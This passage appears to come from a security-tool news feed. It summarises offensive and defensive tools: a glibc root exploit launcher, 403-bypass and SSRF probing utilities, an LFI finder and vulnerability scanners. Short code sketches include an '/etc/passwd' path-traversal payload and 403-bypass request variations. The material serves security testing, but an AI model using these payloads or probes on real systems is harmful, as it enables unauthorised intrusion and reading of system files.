C. Adding it to the self.iac_checks dictionary inside init_checks:

    self.iac_checks = {
        new_tool.name: new_tool,
        …
    }

Step 3 – Adding the check tool to the compatibility matrix inside the Compatibility class

Next, inside the file src/iac_scan_runner/compatibility.py, the dictionary that represents the compatibility matrix should be extended as well. There are two possible cases: a) a new file type is added as a key, together with a list of relevant tools as its value, or b) the new tool is added to the compatibility list of an existing file type.

    compatibility_matrix = {
        "new_type": ["new_tool_1", "new_tool_2"],
        …
        "old_typeK": ["tool_1", … "tool_N", "new_tool_3"]
    }

Step 4 – Providing support for result summarization

Finally, the last step in the sequence of modifications required for extending the scan workflow is to modify the ResultsSummary class (src/iac_scan_runner/results_summary.py). Precisely, it is required to append to its method summarize_outcome a piece of code that looks for tool-specific strings that identify whether the check passed or failed. Inside the loop that traverses the compatible checks, the following if-else structure should be included for each new tool:

        if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"

Contact

You can contact the xOpera team by sending an email to xopera@xlab.si.

Acknowledgement

This project has received funding from the European Union’s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.
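
The snippet below is not WebSecProbe's actual code; it is a minimal sketch of the behaviour described above, with a shortened payload list and the public Wayback Machine availability API. The header and payload values are only examples.

import requests

def probe(base_url, path):
    # A few illustrative request variations; WebSecProbe ships its own, longer list.
    payloads = ["", "/", "%2e/", "..;/"]
    for payload in payloads:
        url = f"{base_url}/{path}{payload}"
        resp = requests.get(url, headers={"X-Forwarded-For": "127.0.0.1"}, timeout=10)
        print(url, resp.status_code, len(resp.content))

    # Ask the Wayback Machine whether an archived snapshot of the URL/path exists.
    wayback = requests.get(
        "https://archive.org/wayback/available",
        params={"url": f"{base_url}/{path}"},
        timeout=10,
    ).json()
    print(wayback.get("archived_snapshots", {}).get("closest"))

probe("https://example.com", "admin-login")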

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.


pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
    url = 'https://example.com'  # Replace with your target URL
    path = 'admin-login'  # Replace with your desired path

    probe = WebSecProbe(url, path)
    probe.run()



LooneyPwner - Exploit Tool For CVE-2023-4911, Targeting The 'Looney Tunables' Glibc Vulnerability In Various Linux Distributions

By: Zion3R


Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.

LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.


The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.

Unauthorized root access provides attackers unrestricted authority, enabling them to:

  • Modify, delete, or steal sensitive data.
  • Install malicious software or backdoors.
  • Facilitate ongoing attacks that may remain undetected for extended periods.
  • Cause data breaches, accessing customer data, intellectual property, and financial records.
  • Disrupt critical system operations, potentially causing service outages and harming an organization's reputation.

LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool:

  • Detects the installed glibc version.
  • Checks for vulnerability status.
  • Offers an option for exploitation if vulnerable.

chmod +x looneypwner.sh
./looneypwner.sh
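For context, the glibc detection step listed above can be sketched in a few lines of Python; this is not part of LooneyPwner itself, which is a shell script, and the affected-version range below is a simplification of the advisory:

import platform

# Detect the installed glibc version (the bug was introduced in glibc 2.34;
# patched builds exist within the range below, so always verify vendor patches).
libc, version = platform.libc_ver()
print(f"detected: {libc} {version}")

if libc == "glibc" and version:
    major, minor = (int(x) for x in version.split(".")[:2])
    if (2, 34) <= (major, minor) <= (2, 38):
        print("version is in the range affected by CVE-2023-4911 - check vendor patches")
    else:
        print("version outside the affected range")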


This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.

This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves details such as the page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more. A small sketch of a couple of these lookups follows the feature list.


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content
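As a rough illustration of two of these lookups (page title and certificate dates), here is a small sketch; it is not PathFinder's own code, and the library choices are assumptions:

import socket
import ssl

import requests
from bs4 import BeautifulSoup

url, host = "https://www.facebook.com/", "www.facebook.com"

# Page title via a plain GET and HTML parsing.
title = BeautifulSoup(requests.get(url, timeout=10).text, "html.parser").title
print("Title:", title.string if title else None)

# Certificate validity dates via a TLS handshake.
ctx = ssl.create_default_context()
with ctx.wrap_socket(socket.create_connection((host, 443)), server_hostname=host) as s:
    cert = s.getpeercert()
print("Certificate Start Date:", cert["notBefore"])
print("Certificate Expiration Date:", cert["notAfter"])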

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Sirius - First Truly Open-Source General Purpose Vulnerability Scanner

By: Zion3R


Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.

The framework is built around four general vulnerability identification concepts: the vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy-to-use interface, Sirius hopes to enable industry evolution.


Getting Started

To run Sirius clone this repository and invoke the containers with docker-compose. Note that both docker and docker-compose must be installed to do this.

git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up

Logging in

The default username and password for Sirius is: admin/sirius

Services

The system is composed of the following services:

  • Mongo: a NoSQL database used to store data.
  • RabbitMQ: a message broker used to manage communication between services.
  • Sirius API: the API service which provides access to the data stored in Mongo.
  • Sirius Web: the web UI which allows users to view and manage their data pipelines.
  • Sirius Engine: the engine service which manages the execution of data pipelines.

Usage

To use Sirius, first start all of the services by running docker-compose up. Then, access the web UI at localhost:5173.

Remote Scanner

If you would like to setup Sirius Scan on a remote machine and access it you must modify the ./UI/config.json file to include your server details.

Good Luck! Have Fun! Happy Hacking!



DakshSCRA - Source Code Review Assist

By: Zion3R


Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourages focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Provides a measurable approach for estimating the effort required for a code review.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules for finding areas of interest
  • Options to extend or add new rules for any new or existing languages
  • Generates reports in text, HTML and PDF formats for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view available options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshscra.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with the '-f' option.
dakshscra.py -r php -f dotnet -t /path_to_source_dir
dakshscra.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
dakshscra.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' is used without the '-r' option.
dakshscra.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default, '-vvv' will display all rule checks within each rule category.
dakshscra.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TYPES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Callisto - An Intelligent Binary Vulnerability Analysis Tool

By: Zion3R


Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the pseudo code output looking for potential security vulnerabilities in that pseudo C code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.
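If you go that route, running Semgrep over the extracted pseudo code from Python might look roughly like this; the ruleset path is an assumption (for example, a local copy of the C rules mentioned below):

import json
import subprocess

# Run Semgrep against the decompiled pseudo code and print its findings.
result = subprocess.run(
    ["semgrep", "--config", "rules/c", "--json", "output.c"],
    capture_output=True, text=True, check=False,
)
findings = json.loads(result.stdout).get("results", [])
for f in findings:
    print(f'{f["path"]}:{f["start"]["line"]} {f["check_id"]}')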

I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

Requirements:

  • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
  • Ghidra
  • Semgrep - pip install semgrep
  • requirements.txt - pip install -r requirements.txt
  • Ensure the correct path to your Ghidra directory is set in the config.txt file

To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

  • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
  • -o => define an output file, if you want to save the output
  • -ai and -o are optional parameters
  • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
  • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
  • Ex. (Running all functions through AI Analysis):
    python callisto.py -b vulnProgram.exe -ai -all -o results.txt

Program Output Example:



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
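The same triage idea can be sketched in a few lines of Python (surf itself is written in Go): resolve each host, note whether it points at a private address, and check whether it answers HTTP from your machine.

import ipaddress
import socket

import requests


def classify(host: str) -> str:
    """Rough SSRF-candidate triage: where does the host resolve, and can we reach it?"""
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return "unresolvable"
    if ip.is_private:
        return "internal candidate"            # resolves to a private/internal address
    try:
        requests.get(f"http://{host}", timeout=3)
        return "reachable (less interesting)"  # answers HTTP from our machine
    except requests.RequestException:
        return "external candidate"            # public IP, but no HTTP reply from here


for host in ["intranet.bigcorp.com", "www.bigcorp.com"]:
    print(host, "->", classify(host))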


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.
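For illustration, loading and querying a local LLama 2 GGML model with the llama-cpp-python bindings looks roughly like this; the prompt template and parameters are assumptions rather than HackBot's exact code, and recent llama-cpp-python releases expect GGUF rather than GGML model files:

from llama_cpp import Llama

# Load the local chat model; the filename matches the one HackBot downloads.
llm = Llama(model_path="llama-2-7b-chat.ggmlv3.q4_0.bin", n_ctx=2048)

prompt = "[INST] Explain what an SSRF vulnerability is in two sentences. [/INST]"
output = llm(prompt, max_tokens=256, temperature=0.7)
print(output["choices"][0]["text"])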


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: Quits the chat application.
  • bot_banner: Prints the default bot's banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current session's interactions.
  • vuln_analysis: Performs a vulnerability analysis using the scan data or log file.
  • static_code_analysis: Performs a static code analysis using the scan data or log file.

Note: I am working on more add-ons and similar commands to give a more ChatGPT-like experience

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If you have the know-how to train text-generation models, your help improving the code would be appreciated.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver: it scans URLs for LFI vulnerabilities and, when "root" text appears on the page, it notifies you of the successful payload.
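That check can be sketched with Selenium and geckodriver as follows; the target URL, payload, and success marker are illustrative assumptions, not the tool's exact code:

from selenium import webdriver

# Requires geckodriver on the PATH.
options = webdriver.FirefoxOptions()
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)

target = "http://testsite.local/index.php?page="
payload = "../../../../etc/passwd"

driver.get(target + payload)
if "root:x:0:0" in driver.page_source:
    print(f"[+] LFI confirmed with payload: {payload}")
else:
    print("[-] No LFI indicator found")
driver.quit()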

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Artemis - APK Infrastructure Investigator

By: Zion3R

Overview

A tool for finding APK infrastructure.

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help      Display help
--path      Required. Path of the APK file
--manifest  Display manifest information
--infra     Find all infra addresses, including ip,domain, e.g. --infra ip,domain
--whoise    Whois lookup for all infra, including ip,domain, e.g. --whoise ip,domain
--output    Set output file, e.g. --output out.txt

Usage

Display Manifest


IP Whois


Example Usage:

1. Find infra (domain and ip) in sample4.apk and write the output to out.txt:

python3 main.py --path sample4.apk --infra domain,ip --output out.txt

2. Investigate the domain and IP whois for the APK:

python3 main.py --path sample.apk --whois ip
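For intuition, the kind of string extraction behind --infra can be sketched as follows; the regexes and file handling here are simplifications and assumptions, not Artemis's implementation:

import re
import zipfile

# Pull domain and IP indicators out of an APK's embedded strings.
domain_re = re.compile(rb"[a-z0-9.-]+\.(?:com|net|org|io|info)", re.I)
ip_re = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")

domains, ips = set(), set()
with zipfile.ZipFile("sample4.apk") as apk:
    for name in apk.namelist():
        data = apk.read(name)
        domains.update(m.decode(errors="ignore") for m in domain_re.findall(data))
        ips.update(m.decode(errors="ignore") for m in ip_re.findall(data))

print("domains:", sorted(domains))
print("ips:", sorted(ips))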


Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

By: Zion3R


A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

Artemis is experimental software, under active development - use at your own risk.

Features

For an up-to-date list of features, please refer to the documentation.

Development

Tests

To run the tests, use:

./scripts/test

Code formatting

Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

To run it locally, use:

pre-commit run --all-files

To setup pre-commit so that it runs before each commit, use:

pre-commit install

Building the docs

To build the documentation, use:

cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html

How do I write my own module?

Please refer to the documentation.

Contributing

Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

However obvious it may seem, we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tool is very helpful for finding vulnerabilities present in web applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap, etc. in order to scan ports, sites, hosts and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • The user runs: "python3 web_scan.py (https or http) ://example.com"
  • At first the program will note the initial run time, then it will build the URL with "www.example.com".
  • After this step the system will check the internet connection using ping.
  • Functionalities:-
    • To open the helper menu use --help; to update use --update
    • To skip the current scan/test: CTRL+C
    • To quit the scanner: CTRL+Z
    • The program will report the scanning time taken for each specific test.

Phase 2

  • From here the main function of the scanner will start:
  • The scanner will automatically select a tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)).
  • The command used to initiate each tool (with parameters and extra params) is already given in the code.
